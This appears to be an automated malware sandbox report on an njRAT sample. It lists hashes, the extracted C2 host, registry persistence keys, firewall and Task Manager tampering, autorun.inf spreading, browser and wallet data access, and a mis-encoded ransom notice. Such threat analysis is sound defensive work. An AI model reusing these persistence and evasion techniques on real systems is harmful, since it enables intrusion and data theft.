njrat | be7f72966ca6ba415bfac32889f448fa5bed9a02632da14f363902ff88fd04c1

Analysis

max time kernel
492s
max time network
499s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
15-04-2024 20:46

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

ahhdaddyServer.exe
Size

37KB
MD5

b7d80717060187f2e147b028db8cb96d
SHA1

45ce47e73a1c1b7eb346cf8300c298236da5053e
SHA256

be7f72966ca6ba415bfac32889f448fa5bed9a02632da14f363902ff88fd04c1
SHA512

c8ad1ec55c9f0557cc96b739296a2544d2174f6acf33980777e0f7e953443078a6f3a9acfd43e19b0dbf1d16c473a1b306a42d9baf4a88073fc73c6bdc8212a9
SSDEEP

384:zE/IiuRjtD+P3V+y0b76netHx0sAbOHZrAF+rMRTyN/0L+EcoinblneHQM3epzXj:IemV10b76netStO5rM+rMRa8NuZFt

Score

10^/10

njrat i am furry evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

I am Furry

green-morrison.gl.at.ply.gg:17455

Mutex

e14109296e01cf24bb9b7f72f64c4cb3

Attributes

reg_key
e14109296e01cf24bb9b7f72f64c4cb3
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Disables RegEdit via registry modification 2 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	tmp1CB2.tmp.exe

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	tmpCD54.tmp.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3344	netsh.exe
3956	netsh.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	ahhdaddyServer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	tmp91FF.tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	COM Surrogate.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\37f622693e6086826fd92b3e7e508134.exe	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e14109296e01cf24bb9b7f72f64c4cb3.exe	COM Surrogate.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e14109296e01cf24bb9b7f72f64c4cb3.exe	COM Surrogate.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\37f622693e6086826fd92b3e7e508134.exe	svchost.exe

Executes dropped EXE 10 IoCs

pid	Process
2896	svchost.exe
1752	tmp91FF.tmp.exe
4960	COM Surrogate.exe
2420	tmp7F2A.tmp.exe
4504	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1340	rar.exe
5672	tmp669F.tmp.exe
4000	tmp1CB2.tmp.exe
3824	tmp9993.tmp.exe

Loads dropped DLL 17 IoCs

pid	Process
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe
1712	tmpCD54.tmp.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1712-1091-0x0000000071F50000-0x0000000072380000-memory.dmp	upx
behavioral2/memory/1712-1122-0x0000000071F00000-0x0000000071F0C000-memory.dmp	upx
behavioral2/memory/1712-1119-0x0000000071F10000-0x0000000071F2F000-memory.dmp	upx
behavioral2/memory/1712-1189-0x0000000071ED0000-0x0000000071EF7000-memory.dmp	upx
behavioral2/memory/1712-1190-0x0000000071E90000-0x0000000071EA5000-memory.dmp	upx
behavioral2/memory/1712-1191-0x0000000071D50000-0x0000000071E87000-memory.dmp	upx
behavioral2/memory/1712-1196-0x0000000071EB0000-0x0000000071EC8000-memory.dmp	upx
behavioral2/memory/1712-1197-0x0000000071D30000-0x0000000071D46000-memory.dmp	upx
behavioral2/memory/1712-1202-0x0000000071D20000-0x0000000071D2C000-memory.dmp	upx
behavioral2/memory/1712-1207-0x0000000071C50000-0x0000000071CE4000-memory.dmp	upx
behavioral2/memory/1712-1208-0x00000000719F0000-0x0000000071C4A000-memory.dmp	upx
behavioral2/memory/1712-1212-0x00000000718B0000-0x00000000719C4000-memory.dmp	upx
behavioral2/memory/1712-1213-0x0000000071CF0000-0x0000000071D18000-memory.dmp	upx
behavioral2/memory/1712-1215-0x00000000719D0000-0x00000000719DC000-memory.dmp	upx
behavioral2/memory/1712-1214-0x00000000719E0000-0x00000000719F0000-memory.dmp	upx
behavioral2/memory/1712-1306-0x0000000071F50000-0x0000000072380000-memory.dmp	upx
behavioral2/memory/1712-1359-0x0000000071F10000-0x0000000071F2F000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe"	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\37f622693e6086826fd92b3e7e508134 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\37f622693e6086826fd92b3e7e508134 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e14109296e01cf24bb9b7f72f64c4cb3 = "\"C:\\ProgramData\\COM Surrogate.exe\" .."	COM Surrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\e14109296e01cf24bb9b7f72f64c4cb3 = "\"C:\\ProgramData\\COM Surrogate.exe\" .."	COM Surrogate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe"	tmp1CB2.tmp.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	tmp9993.tmp.exe
File opened (read-only)	\??\X:	tmp9993.tmp.exe
File opened (read-only)	\??\E:	tmp9993.tmp.exe
File opened (read-only)	\??\H:	tmp9993.tmp.exe
File opened (read-only)	\??\P:	tmp9993.tmp.exe
File opened (read-only)	\??\T:	tmp9993.tmp.exe
File opened (read-only)	\??\Y:	tmp9993.tmp.exe
File opened (read-only)	\??\Z:	tmp9993.tmp.exe
File opened (read-only)	\??\J:	tmp9993.tmp.exe
File opened (read-only)	\??\L:	tmp9993.tmp.exe
File opened (read-only)	\??\O:	tmp9993.tmp.exe
File opened (read-only)	\??\Q:	tmp9993.tmp.exe
File opened (read-only)	\??\G:	tmp9993.tmp.exe
File opened (read-only)	\??\I:	tmp9993.tmp.exe
File opened (read-only)	\??\N:	tmp9993.tmp.exe
File opened (read-only)	\??\M:	tmp9993.tmp.exe
File opened (read-only)	\??\R:	tmp9993.tmp.exe
File opened (read-only)	\??\U:	tmp9993.tmp.exe
File opened (read-only)	\??\V:	tmp9993.tmp.exe
File opened (read-only)	\??\W:	tmp9993.tmp.exe
File opened (read-only)	\??\A:	tmp9993.tmp.exe
File opened (read-only)	\??\B:	tmp9993.tmp.exe
File opened (read-only)	\??\K:	tmp9993.tmp.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
284	discord.com
285	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
281	ip-api.com

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER"	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail [email protected] êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü. Â îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû."	tmp1CB2.tmp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0"	tmp9993.tmp.exe

Drops autorun.inf file 1 TTPs 8 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	F:\autorun.inf	svchost.exe
File created	C:\autorun.inf	COM Surrogate.exe
File created	D:\autorun.inf	COM Surrogate.exe
File created	F:\autorun.inf	COM Surrogate.exe
File created	C:\autorun.inf	svchost.exe
File opened for modification	C:\autorun.inf	svchost.exe
File created	D:\autorun.inf	svchost.exe
File created	F:\autorun.inf	svchost.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\Desktop\Wallpaper	tmp9993.tmp.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\110.0.5481.104\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\WINDOWS\Web	tmp1CB2.tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3904	3824	WerFault.exe	388
5408	3824	WerFault.exe	388

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6108	WMIC.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
5944	tasklist.exe
1216	tasklist.exe
3688	tasklist.exe
5916	tasklist.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6112	systeminfo.exe

Kills process with taskkill 27 IoCs

evasion

pid	Process
3760	taskkill.exe
5336	taskkill.exe
592	taskkill.exe
5404	taskkill.exe
4360	taskkill.exe
5536	taskkill.exe
5800	taskkill.exe
1508	taskkill.exe
3968	taskkill.exe
2120	taskkill.exe
5392	taskkill.exe
4972	taskkill.exe
4892	taskkill.exe
3936	taskkill.exe
6000	taskkill.exe
1724	taskkill.exe
5576	taskkill.exe
5496	taskkill.exe
5920	taskkill.exe
5188	taskkill.exe
5444	taskkill.exe
5252	taskkill.exe
4288	taskkill.exe
5812	taskkill.exe
5628	taskkill.exe
2184	taskkill.exe
5280	taskkill.exe

Modifies Control Panel 6 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\Desktop	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\Desktop\WallpaperOriginX = "210"	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\Desktop\WallpaperOriginY = "187"	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\Desktop\MenuShowDelay = "9999"	tmp1CB2.tmp.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\sTimeFormat = "ÕÓÉ"	tmp1CB2.tmp.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::"	tmp1CB2.tmp.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Microsoft\Internet Explorer\Main	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::"	tmp1CB2.tmp.exe

Modifies Internet Explorer start page 1 TTPs 2 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/"	tmp1CB2.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/"	tmp1CB2.tmp.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133576877099211154"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\icon.ico"	tmp9993.tmp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-259785868-298165991-4178590326-1000\{75B076BC-2FC8-4F76-A5CD-47B066CC3ED0}	tmp9993.tmp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\REGFILE\SHELL\OPEN\COMMAND	tmp1CB2.tmp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-259785868-298165991-4178590326-1000\{C6E83386-3350-4D94-B8E6-AF063A8958E7}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-259785868-298165991-4178590326-1000\{ACA91304-C108-4D5B-9E1E-B77D91CCEEB2}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Pictures"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4480	vlc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe
2896	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
2896	svchost.exe
4960	COM Surrogate.exe
4480	vlc.exe
2492	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs

pid	Process
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
3732	chrome.exe
3732	chrome.exe
3732	chrome.exe
3732	chrome.exe
3732	chrome.exe
3732	chrome.exe
3732	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2896	svchost.exe
Token: SeDebugPrivilege	3760	taskkill.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
Token: 33	2896	svchost.exe
Token: SeIncBasePriorityPrivilege	2896	svchost.exe
